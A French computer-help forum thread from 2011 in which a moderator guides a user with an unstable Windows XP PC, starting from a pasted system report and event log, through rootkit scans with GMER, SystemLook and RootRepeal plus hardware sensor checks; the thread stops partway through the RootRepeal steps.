"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Outil de téléchargement Windows Live
"{2075CB0A-D26F-4DAA-B424-5079296B43BA}" = Windows Live FolderShare
"{212748BB-0DA5-46DE-82A1-403736DC9F27}" = MSVC80_x86
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216018FF}" = Java(TM) 6 Update 18
"{29E5EA97-5F74-4A57-B8B2-D4F169117183}" = Adobe Stock Photos CS3
"{2F81FBFC-9A37-431F-9050-14B55485DF5A}" = Internet Library
"{3101CB58-3482-4D21-AF1A-7057FC935355}" = KhalInstallWrapper
"{318AB667-3230-41B5-A617-CB3BF748D371}" = iTunes
"{350C97B8-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3741689E-584D-40C9-B011-373A0371846D}" = Nokia Software Updater
"{46ABBC54-1872-4AA3-95E2-F2C063A63F31}" = Installation Windows Live
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4CE6B3C4-D8E2-4A5D-BEF5-5B69AF843B0C}" = PC Connectivity Solution
"{4CFB3821-1582-4F3B-BF8D-30986923B36B}" = Nokia Multimedia Factory
"{54793AA1-5001-42F4-ABB6-C364617C6078}" = Adobe Linguistics CS3
"{5809E7CF-4DCF-11D4-9875-00105ACE7734}" = Logitech MouseWare 9.79
"{5AAFE9B0-B60B-4B12-B22D-6B15507502E5}" =
"{5C474A83-A45F-470C-9AC8-2BD1C251BF9A}" = Skype™ 4.1
"{5CDC05F7-83E4-4611-AD3C-A6EB2100332A}" =
"{5CDDF96A-BC34-4D72-9ABA-E1FFF0C39977}" =
"{60036680-7CEC-4166-9739-B5A5DB0F5D15}" = ShadowProtect Desktop
"{67AEFC4C-69E4-11D7-85F4-00E018013273}" =
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6956856F-B6B3-4BE0-BA0B-8F495BE32033}" = Apple Software Update
"{6ABE0BEE-D572-4FE8-B434-9E72A289431B}" = Adobe Fonts All
"{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}" = MSVC80_x86_v2
"{6E08CE13-C2AB-4749-9335-5900B958929E}" = Adobe Illustrator CS3
"{6FF5DD7A-FE28-4439-B8CF-1E9AF4EA0A61}" = Adobe Asset Services CS3
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{73B5D990-04EA-4751-B10F-5534770B91F2}" = Adobe Color EU Recommended Settings
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{770F1BEC-2871-4E70-B837-FB8525FFA3B1}" = Windows Live Messenger
"{7A900EAB-DA37-4554-AF19-9C337476D05D}" =
"{802771A9-A856-4A41-ACF7-1450E523C923}" = Adobe XMP Panels CS3
"{821DC151-4691-4E26-AE7E-522921D0FD54}" = RemoteCapture Task
"{82C7B308-0BDD-49D8-8EA5-9CD3A3F9DF41}" = Windows Live Call
"{844DA731-B8B0-4581-AF3C-5158CC16897E}" = BlackBerry v4.2.2 pour terminal mobile sans fil série 8320
"{869D88A5-BD6C-4E39-8536-D95259EAD7E8}" =
"{881A74B3-3D17-4842-B9AF-0761C6E6C4B5}" =
"{8850DEC8-22FD-4F05-A3AA-49B91200C24F}" = ShadowProtect Desktop
"{8A25392D-C5D2-4E79-A2BD-C15DDC5B0959}" = Bonjour
"{8D2BA474-F406-4710-9AE4-D4F22D21F0DD}" = Adobe Device Central CS3
"{8DC42D05-680B-41B0-8878-6C14D24602DB}" = QuickTime
"{8E6808E2-613D-4FCD-81A2-6C8FA8E03312}" = Adobe Type Support
"{9011040C-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003
"{90120000-0020-040C-0000-0000000FF1CE}" = Module de compatibilité pour Microsoft Office System 2007
"{90176341-0A8B-4CCC-A78D-F862228A6B95}" = Adobe Anchor Service CS3
"{9249D7E7-33E7-4CC8-BB0B-3DF3C3CB2568}" = Nokia PC Suite
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9786C836-15BB-4D5A-8317-36EBBA691AD8}_is1" = ZNsoft Icon Maker
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A394342-4A68-4EBA-85A6-55B559F4E700}" = Microsoft .NET Framework 1.1 French Language Pack
"{9C9824D9-9000-4373-A6A5-D0E5D4831394}" = Adobe Bridge CS3
"{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
"{A28F43DA-258F-42EC-9C95-E6C9A7475670}" = hppIOFiles
"{A2B242BD-FF8D-4840-9DAA-9170EABEC59C}" = Adobe CMaps
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{AC5B0C19-D851-42F4-BDA0-410ECF7F70A5}" = PDF Settings
"{AC76BA86-1033-0000-7760-000000000001}" = Adobe Acrobat 6.0 Professional
"{AC76BA86-7AD7-1033-7B44-A70000000000}" = Adobe Reader 7.0
"{AF111648-99A1-453E-81DD-80DBBF6DAD0D}" = MSVC90_x86
"{B131E59D-202C-43C6-84C9-68F0C37541F1}" = Galerie de photos Windows Live
"{B3BF6689-A81D-40D8-9A86-4AC4ACD9FC1C}" = Adobe Camera Raw 4.0
"{B5BAAFAE-3561-463D-8E3F-91761A57ADB8}" =
"{B7030B17-4177-4FA8-A99D-8AD8867A9234}" = MP4 Transcoder
"{B9B35331-B7E4-4E5C-BF4C-7BC87856124D}" = Adobe Default Language CS3
"{B9B9863A-32FD-4133-ADB7-46244ED77694}" = Camera Support Core Library
"{BEF56F2D-56ED-4176-BF72-7B68D4A3B98D}" = Canon PhotoRecord
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}" = Canon Utilities ZoomBrowser EX
"{C2D69781-F392-4118-A5A7-C7E9C38DBFC2}" = Adobe ExtendScript Toolkit 2
"{C43048A9-742C-4DAD-90D2-E3B53C9DB825}" = Logiciel QuickCam de Logitech
"{C50EF365-2898-489A-B6C7-30DAA466E9A2}" = Nokia Connectivity Cable Driver
"{C6866B7D-ACFD-4C49-B77B-3B2F8CF54B96}" =
"{CA0A1E54-CE0F-4366-B09C-A87B61DC5633}" =
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE67DBBB-2ED0-4F35-B482-0CFE4CFC1570}" = Adobe Setup
"{D0DFF92A-492E-4C40-B862-A74A173C25C5}" = Adobe Version Cue CS3 Client
"{D2559B88-CC9D-4B48-81BB-F492BAA9C48C}" = Adobe PDF Library Files
"{D3116CC7-24DC-4CA3-9CE1-23FED836E9F2}" = Assistant de connexion Windows Live
"{D48C9BFC-FBCF-4F29-B97D-822ED6D497FE}" = PC Studio for SGH-Z500V
"{DADD7B8A-BCB0-44F5-967A-ECB6B4F2ECD9}" = Adobe Color Common Settings
"{DD7DB3C5-6FA3-4FA3-8A71-C2F2940EB029}" = Adobe Color JA Extra Settings
"{DE286975-ACF1-45B8-9EF7-34E162B2C817}" = MovieEdit Task
"{DFE60A2D-6191-4760-A7C5-E229C8D71978}" = BlackBerry Desktop Software 4.6
"{E69AE897-9E0B-485C-8552-7841F48D42D8}" = Adobe Update Manager CS3
"{E8D7DC60-44F9-4523-B56E-88860B7E3028}" = Shuttle Wireless LAN
"{EA6C1A80-D188-427C-8102-226CF9E35AF4}" = Symbian Developer Certificate Request
"{EC4455AB-F155-4CC1-A4C5-88F3777F9886}" = Apple Mobile Device Support
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{EF4C7EB0-D71B-43A3-9552-8053DE4B0401}" = PhotoStitch
"{EFCE5837-FC21-11D6-9D24-00010240CE95}" = Java 2 Runtime Environment, SE v1.4.1_02
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}" = Logitech SetPoint
"{F333A33D-125C-32A2-8DCE-5C5D14231E27}" = Visual C++ 2008 x86 Runtime - (v9.0.30729)
"{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01" = Visual C++ 2008 x86 Runtime - v9.0.30729.01
"{F37942A8-B21B-4C5A-A1D2-B676BF55EAE0}" = Camera Window
"{F6377647-81AF-41C0-BC7E-06CF37E204AB}" = Roxio Media Manager
"{FB08F381-6533-4108-B7DD-039E11FBC27E}" = Realtek AC'97 Audio
"{FF29A7E2-FF40-4D07-B7E4-2093DE59E10A}" = Adobe Color NA Extra Settings
"05B59228C7E1C21DFBE89260F879BD95880548D8" = Package de pilotes Windows - Nokia Modem (10/05/2009 4.2)
"0C5EDC3653FED5B121F464339EAC12534D253B25" = Package de pilotes Windows - Nokia Modem (02/15/2007 3.1)
"504244733D18C8F63FF584AEB290E3904E791693" = Package de pilotes Windows - Nokia pccsmcfd (08/22/2008 7.0.0.0)
"6A630DCEC5EEC912115F2FF59D8C2C769798D930" = Package de pilotes Windows - Nokia Modem (10/12/2007 3.6)
"819D45A9F73817F5B6D7C71A33ADAB88C5DA1765" = Package de pilotes Windows - Nokia Modem (08/03/2007 6.84.0.2)
"8CDCFB95BB84DD9C0F88F22266A0CA86035E55BA" = Package de pilotes Windows - Nokia Modem (06/01/2009 7.01.0.4)
"9CD348AE9C64C4B939B624E8E24F3903EFDFC82B" = Package de pilotes Windows - Nokia Modem (05/22/2008 7.00.0.1)
"ACDSee 32" = ACDSee 32
"AddressBook" =
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
"Adobe PageMaker 7.0" = Adobe PageMaker 7.0
"Adobe Photoshop 5.5 Tryout" = Adobe Photoshop 5.5 Tryout
"Adobe Shockwave Player" = Adobe Shockwave Player 11.5
"Adobe SVG Viewer" = Adobe SVG Viewer 3.0
"Adobe_e21d2df5563f0bf421cf2cc5ec26c42" = Adobe Illustrator CS3
"Audacity_is1" = Audacity 1.2.6
"B726756F5B5A5AA9D798B399386FC6205A45F19E" = Package de pilotes Windows - Nokia Modem (02/15/2007 3.1)
"BlackBerry_{DFE60A2D-6191-4760-A7C5-E229C8D71978}" = BlackBerry Desktop Software 4.6
"Branding" =
"C5A76DC11BABDA0A881E7BE8DDEB641365A77FFD" = Package de pilotes Windows - Nokia Modem (05/22/2008 3.8)
"CBF192A85B624E32B8D19ADEEF2DCFC5BC3AA73A" = Package de pilotes Windows - Nokia Modem (03/05/2008 3.7)
"CD8424B9400BFF7D34AA18F816C71322AC4BDAA7" = Package de pilotes Windows - Nokia Modem (05/24/2007 6.84.0.1)
"Connection Manager" =
"Declan's French FlashCards_is1" = Declan's French FlashCards v1.4
"Declan's Korean Dictionary_is1" = Declan's Korean Dictionary v1.1
"Declan's Korean FlashCards_is1" = Declan's Korean FlashCards v2.1
"Declan's Spanish FlashCards_is1" = Declan's Spanish FlashCards v1.6
"DirectAnimation" =
"DirectDrawEx" =
"DXM_Runtime" =
"E092B2EBF2FFE83E896F8F7F829A7B5D7D1B2F9D" = Package de pilotes Windows - Nokia Modem (03/13/2008 6.86.0.1)
"ERUNT_is1" = ERUNT 1.1j
"F1CB0AC2D40DDCFCA6933082B115073476C155DE" = Package de pilotes Windows - Nokia Modem (08/03/2007 3.2)
"Fontcore" =
"Home'Bank Light_is1" = Home'Bank Light 3.3.3
"ICW" =
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"IE40" =
"IE4Data" =
"IE5BAKEX" =
"ie7" = Windows Internet Explorer 7
"ie8" = Windows Internet Explorer 8
"IEData" =
"InstallShield Uninstall Information" =
"InstallShield_{16976C6C-F8D5-4317-9DE8-1F6352B66725}" = Canon RAW Image Task for ZoomBrowser EX
"InstallShield_{2F81FBFC-9A37-431F-9050-14B55485DF5A}" = Canon Internet Library for ZoomBrowser EX
"InstallShield_{821DC151-4691-4E26-AE7E-522921D0FD54}" = Canon RemoteCapture Task for ZoomBrowser EX
"InstallShield_{B9B9863A-32FD-4133-ADB7-46244ED77694}" = Canon Camera Support Core Library
"InstallShield_{D48C9BFC-FBCF-4F29-B97D-822ED6D497FE}" = PC Studio
"InstallShield_{DE286975-ACF1-45B8-9EF7-34E162B2C817}" = Canon MovieEdit Task for ZoomBrowser EX
"InstallShield_{EF4C7EB0-D71B-43A3-9552-8053DE4B0401}" = Canon Utilities PhotoStitch 3.1
"InstallShield_{F37942A8-B21B-4C5A-A1D2-B676BF55EAE0}" = Canon Camera Window for ZoomBrowser EX
"InstallWIX_{1A59064A-12A9-469F-99F6-04BF118DBCFF}" = Kaspersky PURE
"Korean HakGyo_is1" = Korean HakGyo version 2.1
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"Media Player" = Media Player
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft NetShow Player 2.0" =
"MobileOptionPack" =
"Mozilla Firefox (3.6.16)" = Mozilla Firefox (3.6.16)
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"MSI30a-KB884016" =
"MSI30-Beta1" =
"MSI30-Beta2" =
"MSI30-KB884016" =
"MSI30-RC1" =
"MSI30-RC2" =
"MSI31-Beta" =
"MSI31-RC1" =
"MsJavaVM" =
"Nero - Burning Rom!UninstallKey" =
"NeroMultiInstaller!UninstallKey" = Nero Suite
"NeroVision!UninstallKey" = NeroVision Express 2
"NetMeeting" =
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"NMPUninstallKey" =
"Nokia Multimedia Factory{4CFB3821-1582-4F3B-BF8D-30986923B36B}" = Nokia Multimedia Factory
"Nokia PC Suite" = Nokia PC Suite
"Notepad++" = Notepad++
"OutlookExpress" =
"PCHealth" =
"PhotoRecord" =
"Picasa 3" = Picasa 3
"QcDrv" = Programme de gestion Camera de Logitech®
"ReadWrite Korean_is1" = ReadWrite Korean version 2.1
"SchedulingAgent" =
"Sevinst" =
"Shockwave" =
"TMM90JDAME" = PRINCIPIANTE SIN NOCIONES
"ViewpointMediaPlayer" = Viewpoint Media Player (Remove Only)
"Wdf01005" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.5
"Wdf01007" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.7
"WGA" = Windows Genuine Advantage Validation Tool
"WIC" = Windows Imaging Component
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Lecteur Windows Media 11
"Windows XP Service" = Windows XP Service Pack 3
"WinLiveSuite_Wave3" = Installation Windows Live
"WinRAR archiver" = Archiveur WinRAR
"winscp3_is1" = WinSCP 4.3.2
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"WordFile Creator Pro (Korean)_is1" = WordFile Creator Pro (Korean) 1.2
"Wudf01007" = Microsoft User-Mode Driver Framework Feature Pack 1.7

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Google Chrome" = Google Chrome

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 2/05/2011 3:04:48 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 2/05/2011 9:04:46 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 3/05/2011 6:23:56 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 3/05/2011 12:23:55 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 6/05/2011 9:57:52 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 6/05/2011 15:57:52 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 3:56:34 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 9:56:32 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 4:30:01 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 10:30:00 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 4:30:01 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 10:30:01 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 13:05:15 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 19:05:14 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 11/05/2011 2:39:05 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 11/05/2011 8:39:04 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 11/05/2011 4:46:37 | Computer Name = KARIM-PBDRK3C5J | Source = crypt32 | ID = 131080
Description = Échec de la récupération de la mise à jour automatique du numéro de
séquence de la liste racine tierce partie à partir de : <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
avec l'erreur : Cette opération s'est terminée car le délai d'attente a expiré.


Error - 11/05/2011 7:11:18 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 11/05/2011 13:11:17 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

[ System Events ]
Error - 11/05/2011 4:13:44 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service wuauserv
avec les arguments "" pour démarrer le serveur : {E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error - 11/05/2011 4:14:17 | Computer Name = KARIM-PBDRK3C5J | Source = Service Control Manager | ID = 7026
Description = Le pilote de démarrage système ou d'amorçage suivant n'a pas pu se
charger : CSVirtualDiskDrv Fips intelppm kl1 KLIF sbmount SYMTDI

Error - 11/05/2011 4:14:49 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service EventSystem
avec les arguments "" pour démarrer le serveur : {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error - 11/05/2011 4:17:02 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service EventSystem
avec les arguments "" pour démarrer le serveur : {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error - 11/05/2011 4:18:02 | Computer Name = KARIM-PBDRK3C5J | Source = Service Control Manager | ID = 7026
Description = Le pilote de démarrage système ou d'amorçage suivant n'a pas pu se
charger : CSVirtualDiskDrv Fips intelppm kl1 KLIF sbmount SYMTDI

Error - 11/05/2011 7:01:44 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service MSIServer
avec les arguments "" pour démarrer le serveur : {000C101C-0000-0000-C000-000000000046}

Error - 11/05/2011 7:01:50 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service MSIServer
avec les arguments "" pour démarrer le serveur : {000C101C-0000-0000-C000-000000000046}

Error - 11/05/2011 7:08:01 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service CSObjectsSrv
avec les arguments "" pour démarrer le serveur : {D7B356D0-0DA4-11DB-8993-005056C00008}

Error - 11/05/2011 7:08:04 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service EventSystem
avec les arguments "" pour démarrer le serveur : {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error - 11/05/2011 7:10:29 | Computer Name = KARIM-PBDRK3C5J | Source = Service Control Manager | ID = 7009
Description = Délai (30000 millisecondes) d'attente pour une connexion du service
Roxio Hard Drive Watcher 9.


< End of report >
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede bea23 » 11 Mai 2011, 16:10

Voilà, j'espère ne rien avoir loupé ou oublié
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede nickW » 12 Mai 2011, 00:48

Bonsoir,

Autres recherches:
Note importante: ces deux recherches peuvent prendre ... un certain temps.


Je te conseille d'imprimer la procédure ou d'en sélectionner toutes les lignes puis de copier cette sélection dans un fichier texte sur ton PC (Note: tu n'auras pas accès à Internet ni au navigateur lors de l'étape 4).
Il faut exécuter toutes les étapes, sans interruption, dans l'ordre exact indiqué ci-dessous.
Si un élément te paraît obscur, demande des explications avant de commencer.


Étape 1: SystemLook (de jpshortstuff)
Télécharger SystemLook depuis l'un des deux liens ci-dessous:
http://jpshortstuff.247fixes.com/SystemLook.exe
http://images.malwareremoval.com/jpshor ... emLook.exe
Enregistrer ce fichier sur le Bureau.


Étape 2: Gmer, téléchargement
Télécharger le programme exécutable (fichier .exe) depuis la page http://www.gmer.net/#files
Cliquer sur le bouton Download EXE.
Enregistrer le fichier à la racine du disque système (généralement C: ) en notant son nom (qui est aléatoire).


Étape 3: Pas de processus de contrôle en temps réel
Désactiver le module résident de l'antivirus.
Image Kaspersky: clic droit sur l'icône dans la SysBarre (à coté de l'horloge), puis "Suspension de la protection...", "A la demande de l'utilisateur".


Étape 4: Gmer, exécution

Fermer absolument toutes les applications, les connexions et les navigateurs.

Faire un double clic sur le fichier au nom aléatoire téléchargé précédemment.

Attendre quelques instants le chargement du pilote et les premières recherches.

Si l'outil affiche un message "WARNING !!! GMER has found system modification ... Do You want to fully scan your system ?", cliquer sur NO.

Vérifier que toutes les cases de la colonne de droite sont cochées sauf
Sections
les lecteurs autres que C:\
"Show all"

comme ceci:
Image

puis cliquer sur le bouton Scan.

Attendre sans rien faire d'autre (... c'est un peu long...).
Les clés de Registre & fichiers analysés s'affichent en bas de la fenêtre.

Lorsque l'outil a terminé (il n'y a plus de défilement en bas de la fenêtre), cliquer sur le bouton Save ....

Une fenêtre du Bloc-notes va s'ouvrir, contenant le fichier rapport.
Note: Dans le Bloc-notes, vérifier dans le menu Format que l'option "Retour automatique à la ligne" n'est pas cochée.
Enregistrer ce fichier sur le Bureau sous le nom gmer-110511.txt.
Fermer la fenêtre Gmer (clic sur OK).


Étape 5: SystemLook (de jpshortstuff)
Faire un double clic sur SystemLook.exe pour lancer l'exécution de l'outil.

Sélectionner toutes les lignes ci-dessous comprises entre les deux lignes ------- (qu'il ne faut pas sélectionner), puis appuyer simultanément sur les touches Ctrl et C

-----------------------------------------------------

:comment
:filefind
*cleansweep*
:folderfind
*cleansweep*
:regfind
cleansweep


-----------------------------------------------------


Dans la petite fenêtre de SystemLook, faire un clic droit dans la zone blanche et choisir Coller.
Note: les lignes sélectionnées précédemment doivent avoir été recopiées dans la zone blanche de SystemLook - y compris le caractère "deux points" en début de première ligne.

Cliquer sur le bouton Look pour lancer la recherche.

Lorsque l'outil a terminé cette recherche, il y a ouverture d'une fenêtre du Bloc-notes.
Fermer le Bloc-notes.
Fermer SystemLook en cliquant sur le bouton Exit.


Étape 6: Réactivation des programmes de sécurité résidents
Important: Réactiver le module résident de l'antivirus.


Étape 7: Résultats
Envoyer en réponse:
*- le rapport de Gmer (contenu du fichier gmer-110511.txt)<----ce rapport est parfois très long; vérifier qu'il est complet; si nécessaire le découper en plusieurs messages -- en utilisant toujours le bouton Répondre.
*- le rapport de SystemLook (contenu du fichier SystemLook.txt situé sur le Bureau)


Note importante: Pour l'envoi de ta(tes) réponse(s), il ne faut pas créer un nouveau sujet, mais cliquer sur le bouton "Répondre" Image pour continuer dans ce fil de discussion.

A suivre,
nickW - Image
30/07/2012: Plus de désinfection de PC jusqu'à nouvel ordre.
Pas de demande d'analyse de log en MP (Message Privé)
Mes configs
Avatar de l’utilisateur
nickW
Modérateur
 
Messages: 21698
Inscription: 20 Mai 2004, 17:41
Localisation: Dordogne/Île de France

Re: Demande d'étude de rapports

Messagede bea23 » 13 Mai 2011, 14:43

Bonjour,

J'ai un souci avec l'analyse via Gmer: tout se déroule normalement durant plusieurs heures. Mais cela fait deux fois que je reviens en espérant voir la fin de l'analyse et l'édition du log mais que je retrouve mon PC rebooté et aucun log enregistré.

Lorsque je relance Windows, il m'indique qu'une erreur système est survenue. Voici le détail affiché dans ce message d'erreur:
BCCode : f4 BCP1 : 00000003 BCP2 : 86AFE360 BCP3 : 86AFE4D4
BCP4 : 8060577E OSVer : 5_1_2600 SP : 3_0 Product : 256_1

Une idée de ce qui se passe?
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede nickW » 14 Mai 2011, 00:55

Bonsoir,

1/ Peux-tu effectuer l'analyse avec SystemLook et en envoyer le résultat?
(Étape 5 ci-dessus)


2/ Vérification des voltages et de la température des composants.

Étape 1: HWINFO32 (de REALiX™), téléchargement
Ouvrir la page http://www.hwinfo.com/
Cliquer dans la barre bleue sur Download, puis dans la liste déroulante cliquer sur HWINFO32.
Descendre jusqu'au paragraphe Download HWiNFO32 Package, sous Please choose the package type and download location:.
Télécharger la version Portable ZIP en cliquant sur le bouton bleu Download
Créer un nouveau dossier nommé HWINFO32, et y extraire la totalité des fichiers de l'archive téléchargée hw32_nnn.zip (nnn= no de version).

Étape 2: HWINFO32 (de REALiX™), utilisation
Ouvrir le dossier HWINFO32 créé précédemment, puis faire un double clic sur hwinfo32.exe pour lancer le programme.
Dans la petite fenêtre "Welcome", cliquer sur le bouton RUN.
Il y a ouverture de deux fenêtres.
En premier plan, une fenêtre à fond beige intitulée "System Summary" qui récapitule les principaux composants système de base du PC. Fermer cette fenêtre en cliquant tout en bas à droite sur le bouton Close.
Dans la grande fenêtre à fond blanc, cliquer (en haut) sur le bouton Sensors.
Il y a ouverture d'une fenêtre intitulée "Sensor Status".
Cette fenêtre est mise à jour en permanence.

Elle te permet de vérifier les températures et voltages.


3/ utilisation d'un autre outil de recherche de processus caché:

Étape 1: RootRepeal (de AD), téléchargement
Télécharger RootRepeal via un clic droit sur l'un des liens ci-dessous:
http://ad13.geekstogo.com/RootRepeal.zip
http://rootrepeal.googlepages.com/RootRepeal.zip
http://rootrepeal.psikotick.com/RootRepeal.zip
Enregistrer le fichier sur le Bureau.
Créer un nouveau dossier nommé RootRepeal à la racine du disque système (généralement C:\)

Décompresser l'archive téléchargée (via clic droit, puis "Extraire tout") dans ce nouveau dossier RootRepeal

Étape 2: Pas de processus de contrôle en temps réel
Désactiver le module résident de l'antivirus.

Étape 3: RootRepeal (de AD), exécution

Fermer absolument toutes les applications, les connexions et les navigateurs.

Dans l'Explorateur, ouvrir le dossier RootRepeal
